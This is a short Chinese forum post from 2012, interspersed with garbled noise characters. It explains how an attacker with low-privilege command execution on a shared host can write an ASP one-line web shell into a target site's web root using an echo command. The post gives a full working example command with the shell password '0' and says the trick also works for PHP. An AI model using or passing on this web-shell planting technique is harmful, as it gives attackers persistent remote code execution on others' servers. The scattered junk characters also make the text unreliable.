在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
8 L$ @8 k" d# N6 b. j
- u# X, d; O. | B6 Z, f$ k命令格式
/ ]) e, A Y6 j5 f/ z7 v6 _" T1 x/ E/ ?4 ?
Echo 语句 >目标站绝对目录" H* X* d) A [* Q, d* z
& q; ~! a5 B) R5 H+ \* c/ E例如:
4 V: T* i; M7 p: g0 f& R0 Z1 [$ |
- `& p9 f& q$ U" A; n, Fecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp9 o* F3 z' f# H, C
" {# ^: W$ F* K, M! l" s; g这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。* X/ p6 { ]7 c/ S& x+ R
|
发表于 2012-9-23 14:40:24
收藏
支持
反对